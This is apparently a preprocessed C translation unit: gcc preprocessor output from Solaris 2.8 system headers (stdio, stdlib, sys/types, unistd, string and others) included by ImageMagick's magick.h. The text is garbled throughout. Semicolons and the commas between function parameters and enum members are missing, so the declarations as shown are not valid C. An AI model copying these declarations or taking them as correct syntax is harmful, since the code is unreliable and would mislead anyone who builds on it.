# 36 /usr/include/iso/stdio_iso.h 2 3
# 1 /usr/include/sys/va_list.h 1 3
# 9 /usr/include/sys/va_list.h 3
#pragma ident @(#)va_list.h	1.12	99/05/04 SMI
# 26 /usr/include/sys/va_list.h 3
typedef void *__va_list
# 37 /usr/include/iso/stdio_iso.h 2 3
# 1 /usr/include/stdio_tag.h 1 3
# 9 /usr/include/stdio_tag.h 3
#pragma ident @(#)stdio_tag.h	1.3	98/04/20 SMI
# 21 /usr/include/stdio_tag.h 3
typedef struct __FILE __FILE
# 38 /usr/include/iso/stdio_iso.h 2 3
# 1 /usr/include/stdio_impl.h 1 3
# 9 /usr/include/stdio_impl.h 3
#pragma ident @(#)stdio_impl.h	1.8	99/06/10 SMI
# 1 /usr/include/sys/isa_defs.h 1 3
# 12 /usr/include/stdio_impl.h 2 3
# 22 /usr/include/stdio_impl.h 3
typedef int ssize_t
# 38 /usr/include/stdio_impl.h 3
struct __FILE
{
        ssize_t _cnt
        unsigned char *_ptr
        unsigned char *_base
        unsigned char _flag
        unsigned char _file
        unsigned __orientation:2
        unsigned __ionolock:1
        unsigned __filler:5
}
# 39 /usr/include/iso/stdio_iso.h 2 3
# 59 /usr/include/iso/stdio_iso.h 3
typedef long long __longlong_t
# 75 /usr/include/iso/stdio_iso.h 3
typedef __FILE FILE
typedef unsigned int size_t
typedef __longlong_t fpos_t
# 147 /usr/include/iso/stdio_iso.h 3
extern __FILE __iob[20]
# 164 /usr/include/iso/stdio_iso.h 3
extern int remove(const char *)
extern int rename(const char * const char *)
extern FILE *tmpfile(void)
extern char *tmpnam(char *)
extern int fclose(FILE *)
extern int fflush(FILE *)
extern FILE *fopen(const char * const char *)
extern FILE *freopen(const char * const char * FILE *)
extern void setbuf(FILE * char *)
extern int setvbuf(FILE * char * int size_t)
extern int fprintf(FILE * const char * ...)
extern int fscanf(FILE * const char * ...)
extern int printf(const char * ...)
extern int scanf(const char * ...)
extern int sprintf(char * const char * ...)
extern int sscanf(const char * const char * ...)
extern int vfprintf(FILE * const char * __va_list)
extern int vprintf(const char * __va_list)
extern int vsprintf(char * const char * __va_list)
extern int fgetc(FILE *)
extern char *fgets(char * int FILE *)
extern int fputc(int FILE *)
extern int fputs(const char * FILE *)
extern int getc(FILE *)
extern int putc(int FILE *)
extern int getchar(void)
extern int putchar(int)
extern char *gets(char *)
extern int puts(const char *)
extern int ungetc(int FILE *)
extern size_t fread(void * size_t size_t FILE *)
extern size_t fwrite(const void * size_t size_t FILE *)
extern int fgetpos(FILE * fpos_t *)
extern int fseek(FILE * long int)
extern int fsetpos(FILE * const fpos_t *)
extern long ftell(FILE *)
extern void rewind(FILE *)
extern void clearerr(FILE *)
extern int feof(FILE *)
extern int ferror(FILE *)
extern void perror(const char *)
extern int __filbuf(FILE *)
extern int __flsbuf(int FILE *)
# 37 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/stdio.h 2 3
# 107 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/stdio.h 3
typedef __longlong_t off_t
# 134 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/stdio.h 3
typedef __va_list __not_va_list__
# 151 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/stdio.h 3
extern unsigned char _sibuf[] _sobuf[]
# 168 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/stdio.h 3
extern FILE *fopen64(const char * const char *)
extern FILE *freopen64(const char * const char * FILE *)
extern FILE *tmpfile64(void)
extern int fgetpos64(FILE * fpos_t *)
extern int fsetpos64(FILE * const fpos_t *)
# 193 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/stdio.h 3
extern unsigned char *_bufendtab[]
extern FILE *_lastbuf
# 225 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/stdio.h 3
extern char *tmpnam_r(char *)
# 236 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/stdio.h 3
extern int snprintf(char * size_t const char * ...)
extern int vsnprintf(char * size_t const char * __gnuc_va_list)
# 250 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/stdio.h 3
extern FILE *fdopen(int const char *)
extern char *ctermid(char *)
extern int fileno(FILE *)
# 261 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/stdio.h 3
extern void flockfile(FILE *)
extern int ftrylockfile(FILE *)
extern void funlockfile(FILE *)
extern int getc_unlocked(FILE *)
extern int getchar_unlocked(void)
extern int putc_unlocked(int FILE *)
extern int putchar_unlocked(int)
# 276 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/stdio.h 3
extern FILE *popen(const char * const char *)
extern char *cuserid(char *)
extern char *tempnam(const char * const char *)
extern int getopt(int char *const * const char *)
extern char *optarg
extern int optind opterr optopt
extern int getw(FILE *)
extern int putw(int FILE *)
extern int pclose(FILE *)
extern int fseeko64(FILE * off_t int)
extern off_t ftello64(FILE *)
# 25 ../magick/magick.h 2
# 1 /usr/include/stdlib.h 1 3
# 16 /usr/include/stdlib.h 3
#pragma ident @(#)stdlib.h	1.47	99/11/03 SMI
# 1 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/iso/stdlib_iso.h 1 3
# 37 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/iso/stdlib_iso.h 3
#pragma ident @(#)stdlib_iso.h	1.2	99/12/21 SMI
# 1 /usr/include/sys/feature_tests.h 1 3
# 40 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/iso/stdlib_iso.h 2 3
extern unsigned char __ctype[]
# 57 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/iso/stdlib_iso.h 3
typedef struct {
        int quot
        int rem
} div_t
typedef struct {
        long quot
        long rem
} ldiv_t
# 96 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/iso/stdlib_iso.h 3
typedef long wchar_t
extern void abort(void)
extern int abs(int)
extern int atexit(void (*)(void))
extern double atof(const char *)
extern int atoi(const char *)
extern long int atol(const char *)
extern void *bsearch(const void * const void * size_t size_t
        int (*)(const void * const void *))
extern void *calloc(size_t size_t)
extern div_t div(int int)
extern void exit(int)
extern void free(void *)
extern char *getenv(const char *)
extern long int labs(long)
extern ldiv_t ldiv(long long)
extern void *malloc(size_t)
extern int mblen(const char * size_t)
extern size_t mbstowcs(wchar_t * const char * size_t)
extern int mbtowc(wchar_t * const char * size_t)
extern void qsort(void * size_t size_t
        int (*)(const void * const void *))
extern int rand(void)
extern void *realloc(void * size_t)
extern void srand(unsigned int)
extern double strtod(const char * char **)
extern long int strtol(const char * char ** int)
extern unsigned long int strtoul(const char * char ** int)
extern int system(const char *)
extern int wctomb(char * wchar_t)
extern size_t wcstombs(char * const wchar_t * size_t)
# 19 /usr/include/stdlib.h 2 3
# 1 /usr/include/sys/wait.h 1 3
# 16 /usr/include/sys/wait.h 3
#pragma ident @(#)wait.h	1.21	97/04/08 SMI
# 1 /usr/include/sys/feature_tests.h 1 3
# 19 /usr/include/sys/wait.h 2 3
# 1 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/sys/types.h 1 3
# 25 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/sys/types.h 3
#pragma ident @(#)types.h	1.66	00/02/14 SMI
# 1 /usr/include/sys/isa_defs.h 1 3
# 28 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/sys/types.h 2 3
# 1 /usr/include/sys/feature_tests.h 1 3
# 29 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/sys/types.h 2 3
# 1 /usr/include/sys/machtypes.h 1 3
# 16 /usr/include/sys/machtypes.h 3
#pragma ident @(#)machtypes.h	1.13	99/05/04 SMI
# 1 /usr/include/sys/feature_tests.h 1 3
# 19 /usr/include/sys/machtypes.h 2 3
# 37 /usr/include/sys/machtypes.h 3
typedef unsigned char lock_t
# 34 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/sys/types.h 2 3
# 45 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/sys/types.h 3
# 1 /usr/include/sys/int_types.h 1 3
# 9 /usr/include/sys/int_types.h 3
#pragma ident @(#)int_types.h	1.6	97/08/20 SMI
# 42 /usr/include/sys/int_types.h 3
# 1 /usr/include/sys/isa_defs.h 1 3
# 43 /usr/include/sys/int_types.h 2 3
# 62 /usr/include/sys/int_types.h 3
typedef char int8_t
typedef short int16_t
typedef int int32_t
typedef long long int64_t
typedef unsigned char uint8_t
typedef unsigned short uint16_t
typedef unsigned int uint32_t
typedef unsigned long long uint64_t
# 94 /usr/include/sys/int_types.h 3
typedef int64_t intmax_t
typedef uint64_t uintmax_t
# 110 /usr/include/sys/int_types.h 3
typedef int intptr_t
typedef unsigned int uintptr_t
typedef char int_least8_t
typedef short int_least16_t
typedef int int_least32_t
typedef long long int_least64_t
typedef unsigned char uint_least8_t
typedef unsigned short uint_least16_t
typedef unsigned int uint_least32_t
typedef unsigned long long uint_least64_t
# 46 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/sys/types.h 2 3
# 62 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/sys/types.h 3
typedef long long longlong_t
typedef unsigned long long u_longlong_t
# 85 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/sys/types.h 3
typedef long t_scalar_t
typedef unsigned long t_uscalar_t
typedef unsigned char uchar_t
typedef unsigned short ushort_t
typedef unsigned int uint_t
typedef unsigned long ulong_t
typedef char *caddr_t
typedef long daddr_t
typedef short cnt_t
typedef ulong_t paddr_t
# 118 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/sys/types.h 3
typedef int ptrdiff_t
# 127 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/sys/types.h 3
typedef ulong_t pfn_t
typedef ulong_t pgcnt_t
typedef long spgcnt_t
typedef uchar_t use_t
typedef short sysid_t
typedef short index_t
typedef void *timeout_id_t
typedef void *bufcall_id_t
# 170 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/sys/types.h 3
typedef u_longlong_t ino_t
typedef longlong_t blkcnt_t
typedef u_longlong_t fsblkcnt_t
typedef u_longlong_t fsfilcnt_t
# 193 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/sys/types.h 3
typedef long blksize_t
typedef enum { _B_FALSE _B_TRUE } boolean_t
# 210 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/sys/types.h 3
typedef int64_t pad64_t
typedef uint64_t upad64_t
# 223 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/sys/types.h 3
typedef longlong_t offset_t
typedef u_longlong_t u_offset_t
typedef u_longlong_t len_t
typedef longlong_t diskaddr_t
# 244 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/sys/types.h 3
typedef union {
        offset_t _f
        struct {
                int32_t _u
                int32_t _l
        } _p
} lloff_t
# 264 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/sys/types.h 3
typedef union {
        diskaddr_t _f
        struct {
                int32_t _u
                int32_t _l
        } _p
} lldaddr_t
typedef uint_t k_fltset_t
# 287 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/sys/types.h 3
typedef long id_t
typedef uint_t useconds_t
typedef long suseconds_t
# 308 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/sys/types.h 3
typedef ulong_t major_t
typedef ulong_t minor_t
typedef short pri_t
# 328 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/sys/types.h 3
typedef ushort_t o_mode_t
typedef short o_dev_t
typedef ushort_t o_uid_t
typedef o_uid_t o_gid_t
typedef short o_nlink_t
typedef short o_pid_t
typedef ushort_t o_ino_t
typedef int key_t
typedef ulong_t mode_t
typedef long uid_t
typedef uid_t gid_t
typedef id_t taskid_t
typedef id_t projid_t
typedef unsigned int pthread_t
typedef unsigned int pthread_key_t
typedef struct _pthread_mutex {
        struct {
                uint16_t __pthread_mutex_flag1
                uint8_t __pthread_mutex_flag2
                uint8_t __pthread_mutex_ceiling
                uint32_t __pthread_mutex_type
        } __pthread_mutex_flags
        union {
                struct {
                        uint8_t __pthread_mutex_pad[8]
                } __pthread_mutex_lock64
                upad64_t __pthread_mutex_owner64
        } __pthread_mutex_lock
        upad64_t __pthread_mutex_data
} pthread_mutex_t
typedef struct _pthread_cond {
        struct {
                uint8_t __pthread_cond_flag[4]
                uint32_t __pthread_cond_type
        } __pthread_cond_flags
        upad64_t __pthread_cond_data
} pthread_cond_t
typedef struct _pthread_rwlock {
        int32_t __pthread_rwlock_readers
        uint16_t __pthread_rwlock_type
        uint16_t __pthread_rwlock_magic
        upad64_t __pthread_rwlock_pad1[3]
        upad64_t __pthread_rwlock_pad2[2]
        upad64_t __pthread_rwlock_pad3[2]
} pthread_rwlock_t
typedef struct _pthread_attr {
        void *__pthread_attrp
} pthread_attr_t
typedef struct _pthread_mutexattr {
        void *__pthread_mutexattrp
} pthread_mutexattr_t
typedef struct _pthread_condattr {
        void *__pthread_condattrp
} pthread_condattr_t
typedef struct _once {
        upad64_t __pthread_once_pad[4]
} pthread_once_t
typedef struct _pthread_rwlockattr {
        void *__pthread_rwlockattrp
} pthread_rwlockattr_t
typedef ulong_t dev_t
typedef ulong_t nlink_t
typedef long pid_t
# 481 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/sys/types.h 3
typedef long time_t
typedef long clock_t
typedef int clockid_t
typedef int timer_t
# 21 /usr/include/sys/wait.h 2 3
# 1 /usr/include/sys/resource.h 1 3
# 16 /usr/include/sys/resource.h 3
#pragma ident @(#)resource.h	1.25	98/06/30 SMI
# 1 /usr/include/sys/feature_tests.h 1 3
# 19 /usr/include/sys/resource.h 2 3
# 1 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/sys/types.h 1 3
# 21 /usr/include/sys/resource.h 2 3
# 1 /usr/include/sys/time.h 1 3
# 22 /usr/include/sys/time.h 3
#pragma ident @(#)time.h	2.66	01/01/17 SMI
# 1 /usr/include/sys/feature_tests.h 1 3
# 25 /usr/include/sys/time.h 2 3
# 49 /usr/include/sys/time.h 3
struct timeval {
        time_t tv_sec
        suseconds_t tv_usec
}
# 100 /usr/include/sys/time.h 3
# 1 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/sys/types.h 1 3
# 101 /usr/include/sys/time.h 2 3
# 155 /usr/include/sys/time.h 3
struct itimerval {
        struct timeval it_interval
        struct timeval it_value
}
# 203 /usr/include/sys/time.h 3
typedef longlong_t hrtime_t
# 331 /usr/include/sys/time.h 3
int getitimer(int struct itimerval *)
int utimes(const char * const struct timeval *)
int setitimer(int const struct itimerval * struct itimerval *)
# 389 /usr/include/sys/time.h 3
int gettimeofday(struct timeval * void *)
# 423 /usr/include/sys/time.h 3
# 1 /usr/include/sys/select.h 1 3
# 12 /usr/include/sys/select.h 3
#pragma ident @(#)select.h	1.16	98/04/27 SMI
# 1 /usr/include/sys/feature_tests.h 1 3
# 15 /usr/include/sys/select.h 2 3
# 1 /usr/include/sys/time.h 1 3
# 18 /usr/include/sys/select.h 2 3
# 47 /usr/include/sys/select.h 3
typedef long fds_mask
# 75 /usr/include/sys/select.h 3
typedef struct __fd_set {
        long fds_bits[(((1024)+(((sizeof (fds_mask) * 8))-1))/((sizeof (fds_mask) * 8)))]
} fd_set
# 97 /usr/include/sys/select.h 3
extern int select(int fd_set * fd_set * fd_set * struct timeval *)
# 424 /usr/include/sys/time.h 2 3
# 22 /usr/include/sys/resource.h 2 3
# 75 /usr/include/sys/resource.h 3
typedef u_longlong_t rlim_t
# 102 /usr/include/sys/resource.h 3
struct rlimit {
        rlim_t rlim_cur
        rlim_t rlim_max
}
# 143 /usr/include/sys/resource.h 3
struct rusage {
        struct timeval ru_utime
        struct timeval ru_stime
        long ru_maxrss
        long ru_ixrss
        long ru_idrss
        long ru_isrss
        long ru_minflt
        long ru_majflt
        long ru_nswap
        long ru_inblock
        long ru_oublock
        long ru_msgsnd
        long ru_msgrcv
        long ru_nsignals
        long ru_nvcsw
        long ru_nivcsw
}
# 193 /usr/include/sys/resource.h 3
extern int setrlimit64(int const struct rlimit64 *)
extern int getrlimit64(int struct rlimit64 *)
# 203 /usr/include/sys/resource.h 3
extern int getpriority(int id_t)
extern int setpriority(int id_t int)
extern int getrusage(int struct rusage *)
# 25 /usr/include/sys/wait.h 2 3
# 1 /usr/include/sys/siginfo.h 1 3
# 16 /usr/include/sys/siginfo.h 3
#pragma ident @(#)siginfo.h	1.54	98/03/27 SMI
# 1 /usr/include/sys/feature_tests.h 1 3
# 19 /usr/include/sys/siginfo.h 2 3
# 1 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/sys/types.h 1 3
# 20 /usr/include/sys/siginfo.h 2 3
# 34 /usr/include/sys/siginfo.h 3
union sigval {
        int sival_int
        void *sival_ptr
}
# 69 /usr/include/sys/siginfo.h 3
struct sigevent {
        int sigev_notify
        int sigev_signo
        union sigval sigev_value
        void (*sigev_notify_function)(union sigval)
        pthread_attr_t *sigev_notify_attributes
        int __sigev_pad2
}
# 126 /usr/include/sys/siginfo.h 3
# 1 /usr/include/sys/machsig.h 1 3
# 16 /usr/include/sys/machsig.h 3
#pragma ident @(#)machsig.h	1.15	99/08/15 SMI
# 1 /usr/include/sys/feature_tests.h 1 3
# 19 /usr/include/sys/machsig.h 2 3
# 127 /usr/include/sys/siginfo.h 2 3
# 208 /usr/include/sys/siginfo.h 3
# 1 /usr/include/sys/time_std_impl.h 1 3
# 19 /usr/include/sys/time_std_impl.h 3
#pragma ident @(#)time_std_impl.h	1.2	98/02/13 SMI
# 1 /usr/include/sys/feature_tests.h 1 3
# 22 /usr/include/sys/time_std_impl.h 2 3
# 32 /usr/include/sys/time_std_impl.h 3
typedef struct _timespec {
        time_t __tv_sec
        long __tv_nsec
} _timespec_t
typedef struct _timespec _timestruc_t
# 209 /usr/include/sys/siginfo.h 2 3
# 217 /usr/include/sys/siginfo.h 3
# 1 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/sys/types.h 1 3
# 218 /usr/include/sys/siginfo.h 2 3
typedef struct {
        int si_signo
        int si_code
        int si_errno
        union {
                int __pad[((128 / sizeof (int)) - 3)]
                struct {
                        pid_t __pid
                        union {
                                struct {
                                        uid_t __uid
                                        union sigval __value
                                } __kill
                                struct {
                                        clock_t __utime
                                        int __status
                                        clock_t __stime
                                } __cld
                        } __pdata
                } __proc
                struct {
                        void *__addr
                        int __trapno
                        caddr_t __pc
                } __fault
                struct {
                        int __fd
                        long __band
                } __file
                struct {
                        caddr_t __faddr
                        _timestruc_t __tstamp
                        short __syscall
                        char __nsysarg
                        char __fault
                        long __sysarg[8]
                        int __mstate[10]
                } __prof
        } __data
} siginfo_t
# 26 /usr/include/sys/wait.h 2 3
# 1 /usr/include/sys/procset.h 1 3
# 16 /usr/include/sys/procset.h 3
#pragma ident @(#)procset.h	1.20	00/02/14 SMI
# 1 /usr/include/sys/feature_tests.h 1 3
# 23 /usr/include/sys/procset.h 2 3
# 1 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/sys/types.h 1 3
# 24 /usr/include/sys/procset.h 2 3
# 41 /usr/include/sys/procset.h 3
typedef enum
                {
        P_PID
        P_PPID
        P_PGID
        P_SID
        P_CID
        P_UID
        P_GID
        P_ALL
        P_LWPID
        P_TASKID
        P_PROJID
} idtype_t
# 27 /usr/include/sys/wait.h 2 3
# 86 /usr/include/sys/wait.h 3
extern pid_t wait(int *)
extern pid_t waitpid(pid_t int * int)
extern int waitid(idtype_t id_t siginfo_t * int)
extern pid_t wait3(int * int struct rusage *)
# 23 /usr/include/stdlib.h 2 3
# 68 /usr/include/stdlib.h 3
typedef struct {
        long long quot
        long long rem
} lldiv_t
# 109 /usr/include/stdlib.h 3
extern int rand_r(unsigned int *)
extern void _exithandle(void)
extern double drand48(void)
extern double erand48(unsigned short *)
extern long jrand48(unsigned short *)
extern void lcong48(unsigned short *)
extern long lrand48(void)
extern long mrand48(void)
extern long nrand48(unsigned short *)
extern unsigned short *seed48(unsigned short *)
extern void srand48(long)
extern int putenv(char *)
extern void setkey(const char *)
# 150 /usr/include/stdlib.h 3
extern int mkstemp64(char *)
# 161 /usr/include/stdlib.h 3
extern long a64l(const char *)
extern char *ecvt(double int int * int *)
extern char *fcvt(double int int * int *)
extern char *gcvt(double int char *)
extern int getsubopt(char ** char *const * char **)
extern int grantpt(int)
extern char *initstate(unsigned char * size_t)
extern char *l64a(long)
extern char *mktemp(char *)
extern char *ptsname(int)
extern long random(void)
extern char *realpath(const char * char *)
extern char *setstate(const char *)
extern void srandom(unsigned)
extern int ttyslot(void)
extern int unlockpt(int)
extern void *valloc(size_t)
# 26 ../magick/magick.h 2
# 1 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/stdarg.h 1 3
# 90 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/stdarg.h 3
typedef __gnuc_va_list va_list
# 27 ../magick/magick.h 2
# 1 /usr/include/unistd.h 1 3
# 16 /usr/include/unistd.h 3
#pragma ident @(#)unistd.h	1.58	99/11/11 SMI
# 1 /usr/include/sys/feature_tests.h 1 3
# 19 /usr/include/unistd.h 2 3
# 1 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/sys/types.h 1 3
# 21 /usr/include/unistd.h 2 3
# 1 /usr/include/sys/unistd.h 1 3
# 25 /usr/include/sys/unistd.h 3
#pragma ident @(#)unistd.h	1.37	98/10/28 SMI
# 1 /usr/include/sys/feature_tests.h 1 3
# 28 /usr/include/sys/unistd.h 2 3
# 22 /usr/include/unistd.h 2 3
# 171 /usr/include/unistd.h 3
extern int access(const char * int)
extern unsigned alarm(unsigned)
extern int brk(void *)
extern int chdir(const char *)
extern int chown(const char * uid_t gid_t)
extern int chroot(const char *)
extern int close(int)
extern size_t confstr(int char * size_t)
extern char *crypt(const char * const char *)
extern char *ctermid(char *)
extern char *ctermid_r(char *)
extern char *cuserid(char *)
extern int dup(int)
extern int dup2(int int)
extern void encrypt(char * int)
extern int execl(const char * const char * ...)
extern int execle(const char * const char * ...)
extern int execlp(const char * const char * ...)
extern int execv(const char * char *const *)
extern int execve(const char * char *const * char *const *)
extern int execvp(const char * char *const *)
extern void _exit(int)
# 225 /usr/include/unistd.h 3
extern int fchdir(int)
extern int fchown(int uid_t gid_t)
extern int fdatasync(int)
# 245 /usr/include/unistd.h 3
extern pid_t fork(void)
extern long fpathconf(int int)
extern int fsync(int)
extern int ftruncate64(int off_t)
extern char *getcwd(char * size_t)
extern int getdtablesize(void)
extern gid_t getegid(void)
extern uid_t geteuid(void)
extern gid_t getgid(void)
extern int getgroups(int gid_t *)
extern long gethostid(void)
extern int gethostname(char * size_t)
extern char *getlogin(void)
extern int getopt(int char *const * const char *)
extern char *optarg
extern int opterr optind optopt
extern char *getpass(const char *)
extern int getpagesize(void)
extern pid_t getpgid(pid_t)
extern pid_t getpid(void)
extern pid_t getppid(void)
extern pid_t getpgrp(void)
extern pid_t getsid(pid_t)
extern uid_t getuid(void)
extern char *getwd(char *)
# 321 /usr/include/unistd.h 3
extern int isatty(int)
extern int link(const char * const char *)
extern int lchown(const char * uid_t gid_t)
extern int lockf64(int int off_t)
extern int readlink(const char * char * size_t)
extern off_t lseek64(int off_t int)
extern int nice(int)
extern long pathconf(const char * int)
extern int pause(void)
extern int pipe(int *)
extern off_t tell64(int)
# 360 /usr/include/unistd.h 3
extern ssize_t pread64(int void * size_t off_t)
extern int pthread_atfork(void (*) (void) void (*) (void) void (*) (void))
# 377 /usr/include/unistd.h 3
extern ssize_t pwrite64(int const void * size_t off_t)
extern ssize_t read(int void * size_t)
# 388 /usr/include/unistd.h 3
extern int rmdir(const char *)
extern void *sbrk(intptr_t)
extern int setgid(gid_t)
# 402 /usr/include/unistd.h 3
extern int setpgid(pid_t pid_t)
extern pid_t setpgrp(void)
extern int setregid(gid_t gid_t)
extern int setreuid(uid_t uid_t)
extern pid_t setsid(void)
extern int setuid(uid_t)
extern unsigned sleep(unsigned)
extern void swab(const void * void * ssize_t)
extern int symlink(const char * const char *)
extern void sync(void)
extern long sysconf(int)
extern long __sysconf_xpg5(int)
extern pid_t tcgetpgrp(int)
extern int tcsetpgrp(int pid_t)
extern int truncate64(const char * off_t)
extern char *ttyname(int)
extern useconds_t ualarm(useconds_t useconds_t)
extern int unlink(const char *)
extern int usleep(useconds_t)
extern pid_t vfork(void)
extern ssize_t write(int const void * size_t)
# 834 /usr/include/unistd.h 3
static int
getlogin_r(char *__name int __len)
{
        extern int __posix_getlogin_r(char * int)
        return (__posix_getlogin_r(__name __len))
}
static int
ttyname_r(int __fildes char *__buf size_t __size)
{
        extern int __posix_ttyname_r(int char * size_t)
        return (__posix_ttyname_r(__fildes __buf __size))
}
# 29 ../magick/magick.h 2
# 39 ../magick/magick.h
# 1 /usr/include/string.h 1 3
# 16 /usr/include/string.h 3
#pragma ident @(#)string.h	1.24	99/08/10 SMI
# 1 /usr/include/iso/string_iso.h 1 3
# 28 /usr/include/iso/string_iso.h 3
#pragma ident @(#)string_iso.h	1.2	99/11/09 SMI
# 1 /usr/include/sys/feature_tests.h 1 3
# 32 /usr/include/iso/string_iso.h 2 3
# 60 /usr/include/iso/string_iso.h 3
extern int memcmp(const void * const void * size_t)
extern void *memcpy(void * const void * size_t)
extern void *memmove(void * const void * size_t)
extern void *memset(void * int size_t)
extern char *strcat(char * const char *)
extern int strcmp(const char * const char *)
extern char *strcpy(char * const char *)
extern int strcoll(const char * const char *)
extern size_t strcspn(const char * const char *)
extern char *strerror(int)
extern size_t strlen(const char *)
extern char *strncat(char * const char * size_t)
extern int strncmp(const char * const char * size_t)
extern char *strncpy(char * const char * size_t)
extern size_t strspn(const char * const char *)
extern char *strtok(char * const char *)
extern size_t strxfrm(char * const char * size_t)
# 112 /usr/include/iso/string_iso.h 3
extern void *memchr(const void * int size_t)
extern char *strchr(const char * int)
extern char *strpbrk(const char * const char *)
extern char *strrchr(const char * int)
extern char *strstr(const char * const char *)
# 19 /usr/include/string.h 2 3
# 58 /usr/include/string.h 3
extern char *strtok_r(char * const char * char **)
extern void *memccpy(void * const void * int size_t)
# 79 /usr/include/string.h 3
extern char *strdup(const char *)
# 40 ../magick/magick.h 2
# 1 /usr/include/ctype.h 1 3
# 16 /usr/include/ctype.h 3
#pragma ident @(#)ctype.h	1.33	99/08/10 SMI
# 1 /usr/include/iso/ctype_iso.h 1 3
# 28 /usr/include/iso/ctype_iso.h 3
#pragma ident @(#)ctype_iso.h	1.1	99/08/09 SMI
# 1 /usr/include/sys/feature_tests.h 1 3
# 31 /usr/include/iso/ctype_iso.h 2 3
# 63 /usr/include/iso/ctype_iso.h 3
extern int isalnum(int)
extern int isalpha(int)
extern int iscntrl(int)
extern int isdigit(int)
extern int isgraph(int)
extern int islower(int)
extern int isprint(int)
extern int ispunct(int)
extern int isspace(int)
extern int isupper(int)
extern int isxdigit(int)
extern int tolower(int)
extern int toupper(int)
extern unsigned char __ctype[]
extern unsigned int *__ctype_mask
extern int *__trans_upper
extern int *__trans_lower
# 19 /usr/include/ctype.h 2 3
# 49 /usr/include/ctype.h 3
extern int isascii(int)
extern int toascii(int)
extern int _tolower(int)
extern int _toupper(int)
# 41 ../magick/magick.h 2
# 1 /usr/include/locale.h 1 3
# 9 /usr/include/locale.h 3
#pragma ident @(#)locale.h	1.19	99/08/10 SMI
# 46 /usr/include/locale.h 3
# 1 /usr/include/iso/locale_iso.h 1 3
# 45 /usr/include/iso/locale_iso.h 3
#pragma ident @(#)locale_iso.h	1.1	99/08/09 SMI
# 1 /usr/include/sys/feature_tests.h 1 3
# 48 /usr/include/iso/locale_iso.h 2 3
# 57 /usr/include/iso/locale_iso.h 3
struct lconv {
        char *decimal_point
        char *thousands_sep
        char *grouping
        char *int_curr_symbol
        char *currency_symbol
        char *mon_decimal_point
        char *mon_thousands_sep
        char *mon_grouping
        char *positive_sign
        char *negative_sign
        char int_frac_digits
        char frac_digits
        char p_cs_precedes
        char p_sep_by_space
        char n_cs_precedes
        char n_sep_by_space
        char p_sign_posn
        char n_sign_posn
}
# 95 /usr/include/iso/locale_iso.h 3
extern char *setlocale(int const char *)
extern struct lconv *localeconv(void)
# 47 /usr/include/locale.h 2 3
# 42 ../magick/magick.h 2
# 1 /usr/include/errno.h 1 3
# 17 /usr/include/errno.h 3
#pragma ident @(#)errno.h	1.16	99/07/26 SMI
# 1 /usr/include/sys/errno.h 1 3
# 11 /usr/include/sys/errno.h 3
#pragma ident @(#)errno.h	1.20	00/02/14 SMI
# 24 /usr/include/errno.h 2 3
# 38 /usr/include/errno.h 3
extern int *___errno()
# 43 ../magick/magick.h 2
# 1 /usr/include/fcntl.h 1 3
# 16 /usr/include/fcntl.h 3
#pragma ident @(#)fcntl.h	1.14	97/12/05 SMI
# 1 /usr/include/sys/feature_tests.h 1 3
# 19 /usr/include/fcntl.h 2 3
# 1 /usr/include/sys/stat.h 1 3
# 18 /usr/include/sys/stat.h 3
#pragma ident @(#)stat.h	1.2	99/05/19 SMI
# 1 /usr/include/sys/feature_tests.h 1 3
# 21 /usr/include/sys/stat.h 2 3
